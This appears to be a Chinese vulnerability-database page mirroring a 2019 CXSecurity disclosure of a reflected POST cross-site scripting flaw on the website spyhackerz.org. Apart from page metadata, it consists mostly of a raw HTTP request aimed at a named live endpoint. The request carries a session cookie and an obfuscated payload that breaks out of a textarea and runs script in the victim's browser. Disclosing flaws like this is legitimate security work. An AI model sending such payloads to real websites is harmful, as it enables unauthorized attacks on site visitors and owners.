SpyHackerz.Org POST XSS Injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1823618 漏洞类型
发布时间 2019-11-15 更新时间 2019-11-15
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019110099
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
SpyHackerz.Org POST XSS Enjeksiyon(Injection)
---------------------------------------

#Exploit Date : 15-11-2019
#Exploit Type : POST Cross Site Scripting (Reflected Based)

#Exploit :

POST https://spyhackerz.org/cloudflare-resolver.php?x=cloudflarebypass
Host: spyhackerz.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: /
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Origin: moz-extension://9b3aa359-78d7-450c-a4ff-ed855977b9bc
Connection: keep-alive
Cookie: xf_session=e6f6f8f5c9f1dda3823a7ed5b9b45821

domain=</textarea><h1>Hacked<style/onload=<!--	>
alert
&lpar;1&rpar;></h1>

--------------------------------------------------------
Greetings Thanks : Yusuf